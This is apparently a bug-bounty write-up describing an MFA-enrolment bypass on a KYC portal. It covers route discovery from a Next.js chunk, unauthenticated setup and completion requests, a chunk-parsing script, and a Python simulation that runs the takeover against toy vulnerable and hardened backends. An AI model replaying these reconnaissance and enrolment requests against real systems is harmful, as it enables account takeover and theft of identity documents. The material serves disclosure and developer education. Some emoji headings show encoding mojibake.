🎯 The Target (Redacted 👀)

So I found this "secure" portal handling:

  • KYC 📄
  • Passports 🛂
  • Compliance data 📊

And of course, it had:

👉 Email login 👉 MFA

So naturally I said:

"Yeah… I'm not getting in."

5 minutes later: "I'm definitely getting in." 😭

🧠 Phase 1: OSINT (LinkedIn is the Real Hacker Tool)

I needed a valid user.

So I did elite-level reconnaissance:

👉 Open LinkedIn 👉 Find employee 👉 Guess email

That's it.

OSINT tools? Yes. Brain? Optional.

๐Ÿ” Phase 2: View Source โ€” Because Curiosity Killsโ€ฆ Security

Opened login page → View Source

Nothing interesting.

But then I remembered:

👉 "This is Next.js… there HAVE to be chunk files."

So I downloaded one of the chunk files (call it chunk.js) and ran it through:

grep -oEi '"/[a-z0-9/_-]{3,}"' chunk.js | sort -u

(That pulls out every double-quoted string literal in the bundle that looks like a path, deduplicated.)

And suddenly…

💥 Main character moment

/api/setup-mfa
/api/complete-mfa-setup

Me: "Why are these public…?"
Also me: "Don't ask questions. Exploit." 😌
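Phase 2 in code, as an added example that is not the post's own tooling: the same path-literal test as the grep above, plus a second pass that pairs each fetch() with its HTTP method and the keys of the JSON body it sends, which is where the secret and verificationCode field names read off the chunk in Phase 7 come from. The chunk text is a constructed stand-in for a minified Next.js bundle; the target's real code is not reproduced here, and the route names are just the two from the post plus an unrelated path.

```python
import re

# Constructed stand-in for a minified Next.js chunk (not the target's real code):
# two POST helpers using the routes the post found, plus an unrelated path literal.
SAMPLE_CHUNK = (
    'function u(e){return fetch("/api/setup-mfa",{method:"POST",headers:'
    '{"Content-Type":"application/json"},body:JSON.stringify({email:e})})}'
    'function c(e,t,n){return fetch("/api/complete-mfa-setup",{method:"POST",'
    'headers:{"Content-Type":"application/json"},'
    'body:JSON.stringify({email:e,secret:t,verificationCode:n})})}'
    'const p="/_next/static/chunks/";'
)

# Same test as the grep in the post: a double-quoted literal that looks like a path.
ROUTE_RE = re.compile(r'"(/[a-z0-9/_-]{3,})"', re.IGNORECASE)
# fetch("<literal url>", {   ... the options object literal opens at that final "{"
FETCH_RE = re.compile(r'fetch\("(?P<url>/[^"]*)"\s*,\s*\{')
METHOD_RE = re.compile(r'method:"(?P<m>[A-Za-z]+)"')
BODY_RE = re.compile(r'JSON\.stringify\(\{')


def _object_literal(js, start):
    """Return the balanced {...} that opens at js[start].

    Counts braces only; a brace inside a string literal would throw it off,
    which is an acceptable trade-off for recon over minified bundles.
    """
    depth = 0
    for i in range(start, len(js)):
        if js[i] == "{":
            depth += 1
        elif js[i] == "}":
            depth -= 1
            if depth == 0:
                return js[start:i + 1]
    return js[start:]


def extract_routes(js):
    """Unique path-like string literals, in order of first appearance."""
    seen, routes = set(), []
    for m in ROUTE_RE.finditer(js):
        if m.group(1) not in seen:
            seen.add(m.group(1))
            routes.append(m.group(1))
    return routes


def extract_fetch_calls(js):
    """For each fetch() with a literal URL: url, method and JSON body field names.

    The field names are the 'JS clues' the post used later (secret, verificationCode):
    the keys of the object literal handed to JSON.stringify.
    """
    calls = []
    for m in FETCH_RE.finditer(js):
        opts = _object_literal(js, m.end() - 1)
        method = METHOD_RE.search(opts)
        fields = []
        body = BODY_RE.search(opts)
        if body:
            inner = _object_literal(opts, body.end() - 1)[1:-1]
            fields = [kv.split(":", 1)[0].strip() for kv in inner.split(",") if kv.strip()]
        calls.append({
            "url": m.group("url"),
            "method": method.group("m").upper() if method else "GET",
            "fields": fields,
        })
    return calls


if __name__ == "__main__":
    for route in extract_routes(SAMPLE_CHUNK):
        print(route)
    for call in extract_fetch_calls(SAMPLE_CHUNK):
        print(call["method"], call["url"], call["fields"])
```

Pointing this at a real chunk is a matter of reading the file instead of SAMPLE_CHUNK. The route list is the grep; the fetch list is what turns a bare path into a request you can actually send, method and body keys included, without guessing.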

🚨 Phase 3: The "No Way This Works" Request

I sent, unauthenticated, with nothing but the email:

POST /api/setup-mfa
{
  "email": "target@company.com"
}

Response:

  • Secret (the TOTP seed) ✅
  • QR code (the same seed, as a base64 image) ✅
  • Happiness ❌ (because this should NOT happen)

At this point I knew… This wasn't a bug. This was a lifestyle choice by the backend.

🧪 Phase 4: QR Code = Unauthorized Life Access

Converted base64 → QR → scanned it.

Now my phone was generating OTPs for someone else's account.

Microsoft Authenticator: "Welcome 👋"
Me: "I don't even belong here…" 💀

😭 Phase 5: Reality Check (It Didn't Work)

Tried logging in.

โŒ Failed.

And I was like:

"Okay… security team did SOMETHING at least."

Almost gave up.

Closed terminal.

Opened Instagram, started scrolling.

Then…

⚡ Phase 6: Hacker Instinct Kicks In

Brain:

"You found TWO endpoints… don't be lazy."

Right.

/api/complete-mfa-setup

Endpoint name: complete-mfa-setup
Me: "Oh, so you WANT me to finish it?" 😏

🧠 Phase 7: Final Boss Fight

From the JS chunk, the fields the request body expects:

  • secret
  • verificationCode

So I sent:

POST /api/complete-mfa-setup
{
  "email": "target@company.com",
  "secret": "<secret>",
  "verificationCode": "<OTP from my phone>"
}

💥 BOOM.

"MFA setup completed successfully"

Me staring at screen: "This is why we can't have nice things." 😭

๐Ÿ Phase 8: The "Waitโ€ฆ I'm Actually In" Scene

Login again:

  • Email โœ…
  • OTP (mine 😎) ✅

And…

🚪 ACCESS GRANTED

💀 What I Found Inside

  • Passports 🛂
  • KYC docs 📄
  • Compliance data 📊

Basically:

👉 "Congratulations, you've unlocked GDPR violation DLC." 🎮

📊 Attack Flow (Visual)

(Diagram not reproduced; the same flow in text.)

Guess employee email → grep the Next.js chunk for routes → POST /api/setup-mfa with the email → receive TOTP secret + QR → scan it into my own authenticator → POST /api/complete-mfa-setup with email, secret and my OTP → log in with email + my OTP

โš ๏ธ Why This Is INSANE

This is basically:

  • โŒ MFA without authentication
  • โŒ Identity not verified
  • โŒ Backend trusting anyone
  • โŒ Complete auth bypass

All you need:

👉 Email address

That's it.

🧯 Responsible Disclosure

Before anyone panics:

  • Touched data ❌
  • Downloaded data ❌
  • Reported responsibly ✅

Ethical hacker mode: ON
Chaos mode: OFF

🧠 Developer Takeaways

If you're building auth systems:

  • 🔒 NEVER allow MFA enrolment outside an authenticated session
  • 🔒 Bind every step to that session: the server decides WHO is enrolling, not a field in the request body
  • 🔒 Keep the pending TOTP secret server-side and verify the code against that copy; a secret echoed back by the client proves nothing
  • 🔒 Validate user identity server-side, and re-verify the existing factor (or password) before a factor on an existing account is replaced
  • 🔒 Stop trusting the frontend like it's your best friend
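The whole attack from Phases 3 to 8, and the fix the takeaways describe, as an added example that is not the portal's code: a toy backend with the two endpoints behaving as the post reports them (a secret handed out for any email, the secret accepted back from the client), the same attack run against it with a local TOTP implementation standing in for the phone, and a hardened version where enrolment happens inside a server-side session and the secret never round-trips. The Portal label, target@company.com, the session model and the endpoint signatures are assumptions.

```python
import base64
import hashlib
import hmac
import os
import struct
import time

VICTIM = "target@company.com"   # placeholder address from the post

def totp(secret_b32, at=None, step=30, digits=6):
    """RFC 6238 TOTP over HMAC-SHA1, i.e. what the authenticator app computed in the post."""
    secret_b32 = secret_b32.upper()
    key = base64.b32decode(secret_b32 + "=" * (-len(secret_b32) % 8))
    counter = int(time.time() if at is None else at) // step
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = (struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF) % 10 ** digits
    return str(code).zfill(digits)

class MfaStore:
    """Account table plus the login check both backends end with (email + TOTP, as in the post)."""
    def __init__(self):
        self.users = {VICTIM: {"mfa_secret": None}}

    def login(self, email, otp, now=None):
        seed = self.users[email]["mfa_secret"]
        return seed is not None and hmac.compare_digest(totp(seed, now), otp)

class VulnerableMfa(MfaStore):
    """The backend as the post describes it: both endpoints act on request-body data alone."""
    def setup_mfa(self, email):
        if email not in self.users:
            raise KeyError("unknown user")
        secret = base64.b32encode(os.urandom(20)).decode()
        # Hands the seed to whoever asked; the QR in the post is this URI rendered as an image.
        return {"secret": secret, "otpauth": f"otpauth://totp/Portal:{email}?secret={secret}"}

    def complete_mfa_setup(self, email, secret, verification_code, now=None):
        # Bug: `secret` comes from the client, so a matching code only proves the caller can
        # run TOTP over a seed the caller already holds. Nothing ties the call to `email`.
        if not hmac.compare_digest(totp(secret, now), verification_code):
            raise PermissionError("bad code")
        self.users[email]["mfa_secret"] = secret
        return "MFA setup completed successfully"

class HardenedMfa(MfaStore):
    """Enrolment is a step inside an authenticated session; the seed never comes back in a request."""
    def __init__(self):
        super().__init__()
        self.sessions = {}   # session id -> {"email": ..., "pending_secret": ...}

    def start_session(self, email):
        # Stands in for the first factor (password, magic link, whatever the portal uses):
        # an assumption, since the post does not describe that step.
        sid = base64.urlsafe_b64encode(os.urandom(16)).decode()
        self.sessions[sid] = {"email": email, "pending_secret": None}
        return sid

    def _session(self, sid):
        sess = self.sessions.get(sid)
        if sess is None:
            raise PermissionError("login required")
        return sess

    def setup_mfa(self, sid):
        sess = self._session(sid)
        sess["pending_secret"] = base64.b32encode(os.urandom(20)).decode()   # stored server-side
        # The seed must reach the user's phone (the QR), but the server keeps its own copy.
        return {"otpauth": f"otpauth://totp/Portal:{sess['email']}?secret={sess['pending_secret']}"}

    def complete_mfa_setup(self, sid, verification_code, now=None):
        sess = self._session(sid)
        seed = sess["pending_secret"]                     # the server's copy, not the client's
        if seed is None or not hmac.compare_digest(totp(seed, now), verification_code):
            raise PermissionError("no pending enrolment or bad code")
        self.users[sess["email"]]["mfa_secret"] = seed   # identity comes from the session
        sess["pending_secret"] = None
        return "MFA setup completed successfully"

def takeover_with_email_only(api, now=1_700_000_000):
    """Phases 3, 4, 7 and 8 of the post run against `api`; True if the attacker gets in."""
    try:
        seed = api.setup_mfa(VICTIM)["secret"]             # an email address is all we send
        api.complete_mfa_setup(VICTIM, seed, totp(seed, now), now)
        return api.login(VICTIM, totp(seed, now), now)
    except (PermissionError, KeyError):
        return False

def legitimate_enrolment(api, now=1_700_000_000):
    """Intended flow on the hardened backend: session first, then enrol, then log in."""
    sid = api.start_session(VICTIM)
    seed = api.setup_mfa(sid)["otpauth"].split("secret=")[1]   # what the user's phone scans
    api.complete_mfa_setup(sid, totp(seed, now), now)
    return api.login(VICTIM, totp(seed, now), now)

if __name__ == "__main__":
    print("vulnerable backend, email only:", takeover_with_email_only(VulnerableMfa()))  # True
    print("hardened backend, email only:  ", takeover_with_email_only(HardenedMfa()))    # False
    print("hardened backend, real user:   ", legitimate_enrolment(HardenedMfa()))        # True
```

Run it and the vulnerable backend admits the attacker with nothing but the address, the hardened one refuses the very first call because there is no session, and a user who did log in still enrols normally. The totp() function is plain RFC 6238 (HMAC-SHA1, 30-second step, 6 digits), so it produces the same codes as the phone did; with the RFC test secret GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ it gives 287082 at t=59. Note what the hardened complete_mfa_setup no longer takes: neither an email nor a secret, because both come from state the server already holds.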

🎬 Final Thoughts

Time taken:

โฑ๏ธ ~10 minutes ๐Ÿง  1 brain cell ๐Ÿ“ง 1 email

Impact:

💀 Total account takeover

MFA is supposed to STOP attackers… not onboard them.

"At this point, the only factor in Multi-Factor Authentication… was me."